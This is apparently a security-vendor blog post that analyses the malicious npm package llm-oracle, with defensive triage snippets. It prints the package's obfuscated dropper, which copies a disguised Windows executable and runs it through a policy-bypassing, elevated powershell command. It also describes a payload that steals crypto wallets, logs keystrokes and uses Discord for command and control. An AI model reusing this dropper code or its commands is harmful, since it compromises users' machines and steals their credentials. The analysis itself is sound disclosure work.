Malicious Open Source Library Analysis: llm-oracle and its Payload

AI

SafeDep Team

• Nov 4, 2024 • 5 min read

The good folks at socket.io published their research, Supply Chain Attacks Targeting LLM Application Developers: The Hidden Dangers of Fake Open Source Packages, in which they shared their findings on the discovery and analysis of the malicious npm package llm-oracle. This was interesting to us because vet detects a similar package, redis-oracle, as malicious but not llm-oracle. We decided to take a closer look at llm-oracle.

Scanning for Malware using `vet`

vet can be used to scan a package by its Package URL.

vet scan --purl pkg:/npm/redis-oracle@<version>

This results in a detection, as expected.

However, when we scan llm-oracle, we do not get any detection. This is not entirely surprising because vet by default depends on Package Analysis data for malware detection, which may not be accurate or up-to-date.

Manual Analysis of `llm-oracle`

We decided to manually analyse llm-oracle. The first step was to retrieve the package metadata from the npm registry.

npm view llm-oracle

This produces some useful information including author, publisher and URL of the latest version of the package.

llm-oracle@1.0.2 | MIT | deps: 28 | versions: 3
[...]
dist
.tarball: https://registry.npmjs.org/llm-oracle/-/llm-oracle-1.0.2.tgz
[...]
dependencies:
[...]
maintainers:
- josh.weavery <[email protected]>
published 3 months ago by josh.weavery <[email protected]>

We then fetched the tarball and extracted the contents for local analysis. The archive contained the following files:

-rw-r--r--  1 dev  wheel  16773255 Oct 26  1985 Base64Decode.ts
-rw-r--r--  1 dev  wheel       252 Oct 26  1985 HISTORY.md
-rw-r--r--  1 dev  wheel      1111 Oct 26  1985 LICENSE
-rw-r--r--  1 dev  wheel      3105 Oct 26  1985 README.md
-rw-r--r--  1 dev  wheel      2665 Oct 26  1985 index.js
-rw-r--r--  1 dev  wheel      2170 Oct 26  1985 package.json
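A package tarball can also be inspected without unpacking it. The following is a minimal sketch, not necessarily the workflow used for this analysis: it lists archive members with Python's standard tarfile module and flags unusually large files. The function name and the 1 MB threshold are assumptions chosen for illustration.

```python
import tarfile

# Hypothetical threshold: source files in an npm package are rarely this big.
LARGE_FILE_BYTES = 1_000_000


def list_tarball(path, large_file_bytes=LARGE_FILE_BYTES):
    """Return (name, size, is_large) for every regular file in a .tgz archive.

    Only archive metadata is read; nothing is extracted to disk.
    """
    entries = []
    with tarfile.open(path, "r:gz") as archive:
        for member in archive.getmembers():
            if member.isfile():
                is_large = member.size > large_file_bytes
                entries.append((member.name, member.size, is_large))
    return entries
```

Under these assumptions, a 16 MB file with a .ts extension, such as Base64Decode.ts in the listing above, would be flagged for a closer look.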

The first step in any malware analysis process is to identify the file types. The simplest way to do that is using the file(1) command. Surprisingly, the first step itself gave us a strong malware indicator.

Base64Decode.ts: PE32+ executable (GUI) x86-64, for MS Windows
HISTORY.md:      ASCII text, with CRLF line terminators
LICENSE:         ASCII text, with CRLF line terminators
README.md:       ASCII text, with CRLF line terminators
index.js:        ASCII text, with CRLF line terminators
package.json:    JSON data
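The same check can be approximated in a script when file(1) is not available. The sketch below is a simplified stand-in for file(1), not a replacement for it: it only tests for the DOS "MZ" magic and the PE signature that the header points to. Both function names are hypothetical.

```python
import struct


def looks_like_pe(data: bytes) -> bool:
    """Return True if the bytes start like a Windows PE executable.

    A PE file begins with the DOS magic "MZ". The 4-byte little-endian value
    at offset 0x3C points to the signature "PE" followed by two NUL bytes.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"


def is_disguised_executable(filename: str, data: bytes) -> bool:
    """Flag PE content hiding behind an extension other than .exe or .dll."""
    has_binary_extension = filename.lower().endswith((".exe", ".dll"))
    return looks_like_pe(data) and not has_binary_extension
```

Reading the first few kilobytes of each file in a package and passing them to is_disguised_executable would, under these assumptions, single out a file like Base64Decode.ts.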

Base64Decode.ts was a Windows x86_64 executable with a .ts extension. Before jumping into the payload, we wanted to examine the dropper, index.js, to confirm its behaviour. index.js contained the following semi-obfuscated code:

const targetFilePath = path.join(
  process.env.LOCALAPPDATA,
  String('\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065').replace(/\+/g, '')
);

if (!fs.existsSync(targetFilePath)) {
  setTimeout(() => {
    fs.copyFileSync(modelFilePath, targetFilePath);
    exec(
      `p\u006fwersh\u0065ll -\u0045x\u0065cut\u0069\u006fnP\u006fl\u0069cy Byp\u0061ss St\u0061rt-Pr\u006fcess -F\u0069leP\u0061th '${targetFilePath}' -V\u0065rb R\u0075n\u0041s`,
      (error, stdot, stderr) => {}
    );
  }, 60000);
}

While advanced malware analysis techniques may differ (j/k), we used the good old Ruby interpreter to view the obfuscated strings.

irb(main):001:0> "\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065"
=> "chrome.exe"

irb(main):006:0> "f\u0073.copyFileSync(m\u006fd\u0065lFileP\u0061th, t\u0061rg\u0065tFileP\u0061th); e\u0078ec(`p\u006fwersh\u0065ll -\u0045x\u0065cut\u0069\u006fnP\u006fl\u0069cy Byp\u0061ss St\u0061rt-Pr\u006fcess -F\u0069leP\u0061th '${t\u0061rg\u0065tFileP\u0061th}' -V\u0065rb R\u0075n\u0041s`, (err\u006fr, std\u006ft, std\u0065rr)"
=> "fs.copyFileSync(modelFilePath, targetFilePath); exec(`powershell -ExecutionPolicy Bypass Start-Process -FilePath '${targetFilePath}' -Verb RunAs`, (error, stdot, stderr)"
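Any tool that understands \u escapes does the job here. As an alternative to the irb session above, the following Python sketch decodes the same escapes with a regular expression, so the obfuscated text is only ever treated as data. The function name is hypothetical.

```python
import re

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def decode_unicode_escapes(text: str) -> str:
    """Replace each backslash-u escape (four hex digits) with its character."""
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


# Raw strings keep the backslashes literal, exactly as they appear in index.js.
print(decode_unicode_escapes(r"\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065"))
# → chrome.exe
print(decode_unicode_escapes(r"p\u006fwersh\u0065ll -\u0045x\u0065cut\u0069\u006fnP\u006fl\u0069cy Byp\u0061ss"))
# → powershell -ExecutionPolicy Bypass
```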

The Payload

From index.js, we can see that Base64Decode.ts, a Windows executable, is copied to %LOCALAPPDATA% as chrome.exe after a 60-second delay (if no file with that name already exists) and then launched through powershell.exe with -Verb RunAs, which requests elevation. To understand the behaviour of the payload, we expected to get our hands dirty with our old friend IDA Pro or its close cousin Ghidra. Instead, strings(1) put us on a different path: the payload contained the following strings, which indicate that it is a Python script packaged as an executable using PyInstaller.

Cannot open PyInstaller archive from executable (%s) or external archive (%s)
Installing PYZ: Could not get sys.path!
PYINSTALLER_STRICT_UNPACK_MODE
PyInstaller: FormatMessageW failed.
PyInstaller: pyi_win32_utils_to_utf8 failed.
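The check above can be scripted for triage. The sketch below is a rough approximation of strings(1), not an equivalent: it extracts runs of printable ASCII from a binary and keeps those that mention one of the marker strings shown above. The function names and the choice of markers are assumptions for illustration.

```python
import re

# Marker substrings taken from the strings(1) output shown above.
PYINSTALLER_MARKERS = ("PyInstaller", "PYINSTALLER_STRICT_UNPACK_MODE")

# Runs of at least four printable ASCII bytes.
_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def printable_strings(data: bytes):
    """Yield runs of 4+ printable ASCII bytes found in the data."""
    for match in _PRINTABLE_RUN.finditer(data):
        yield match.group().decode("ascii")


def pyinstaller_hints(data: bytes):
    """Return the extracted strings that mention a PyInstaller marker."""
    return [
        text
        for text in printable_strings(data)
        if any(marker in text for marker in PYINSTALLER_MARKERS)
    ]
```

A non-empty result is only a hint that the file was built with PyInstaller; confirming it still requires extracting the embedded archive.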

Extracting the PyInstaller archive from the executable gave us its bundled files.

Among these files, OH8xADfF8q.pyc looked interesting, with strings like:

'D:\work\Python-Trojan-src\OH8xADfF8q.py

OH8xADfF8q.pyc in turn decompiles to something like this:

import os
import discord
[...]
exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtl...', 'utf-8')).decode('utf-8'))

The base64 encoded string contains the actual payload, which decodes to a Python script that performs various conventional malware activities.
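When unwrapping a layer like this, the safe approach is to decode the string and read the result rather than let exec run it. A minimal sketch follows, with a hypothetical helper name. It is applied only to the visible prefix of the string quoted above, since the rest is elided.

```python
import base64


def decode_base64_layer(encoded: str) -> str:
    """Decode one base64 layer to text. The result is returned, never executed."""
    return base64.b64decode(encoded, validate=True).decode("utf-8")


# Only the 20 characters visible in the decompiled snippet are decoded here.
print(decode_base64_layer("aW1wb3J0IGJhc2U2NDtl"))  # → import base64;e
```

The decoded prefix begins with another base64 import, which suggests that the next stage may itself be wrapped in a further encoding layer. The elided remainder would be needed to confirm that.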

Behaviour

Looks for crypto wallets: metamask, tronlink, trustwallet, coinbase, flint, exodus, binance, phantom, Xverse, Slope, Solflare, Typhon, nami, keplr, okx, bitski, myetherwallet
Looks for Chrome extension data for these wallets
Downloads configuration from https://bayard-front-833a4.web.app/start.dat

{
  "gid": "12 __76 __201 __8416 __20 __815 __932",
  "tkn": "MT __I __3NjIwMzQ __yNjY __2NDk0 __MzY2Ng.GUg __pUL.X __Xj7OFha __7Z5r __gYZHw __tatOdp3l __i6bZ __HrDQXDCn4"
}

Connects to a Discord server using the Guild ID and Token
Creates a new channel using the current username and a random string
Starts a keylogger
Starts taking screenshots of the active window
Sends keystrokes and screenshots to the Discord channel
Starts a full command-and-control channel over Discord
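The gid and tkn values in the downloaded configuration are broken up by " __" sequences. The sketch below assumes that the payload simply strips this filler before using the values. That is an inference from the data, not something shown in the decompiled code, and the helper name is hypothetical.

```python
def strip_separators(value: str, separator: str = " __") -> str:
    """Remove the filler separator from a config value.

    Assumption: the separator is pure padding and carries no information.
    """
    return value.replace(separator, "")


gid = strip_separators("12 __76 __201 __8416 __20 __815 __932")
print(gid)  # → 1276201841620815932
```

The result is a 19-digit number, which is at least consistent with the length of a Discord guild ID.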

File Transfer

The payload checks whether the file requested for transfer is larger than 25MB. If so, it fetches configuration from https://api.gofile.io/getServer and uploads the file to https://{server}.gofile.io/uploadFile using the Python requests library. When we tried to access the URL, we got a 404 Not Found response, indicating that the application is probably geo-fenced or checks for some request attribute.
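The network endpoints mentioned in this post can be turned into a simple lookup for reviewing proxy or DNS logs. The following is a sketch under stated assumptions: the labels and function name are hypothetical, and gofile.io is a legitimate file-sharing service, so a match on it is a weak signal on its own.

```python
from urllib.parse import urlsplit

# Hosts taken from this post. Labels are illustrative only.
INDICATOR_HOSTS = {
    "bayard-front-833a4.web.app": "payload configuration",
    "api.gofile.io": "gofile server lookup",
}
# The upload host is https://{server}.gofile.io, so match on the suffix.
INDICATOR_SUFFIXES = {".gofile.io": "gofile upload"}


def classify_url(url: str):
    """Return a short label if the URL's host matches an indicator, else None."""
    host = (urlsplit(url).hostname or "").lower()
    if host in INDICATOR_HOSTS:
        return INDICATOR_HOSTS[host]
    for suffix, label in INDICATOR_SUFFIXES.items():
        if host.endswith(suffix):
            return label
    return None
```

Exact host matches are checked before suffix matches so that api.gofile.io keeps its more specific label.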

Conclusion

llm-oracle is a malicious package that contains a Windows executable
The packaging and sophistication of the malware appear to be low
Common attacker TTPs were used for payload execution: powershell.exe, PyInstaller and base64 encoding
We expect AVs and EDRs to detect this payload using behavioural analysis
Discord was used as the C2 server for exfiltration and command and control

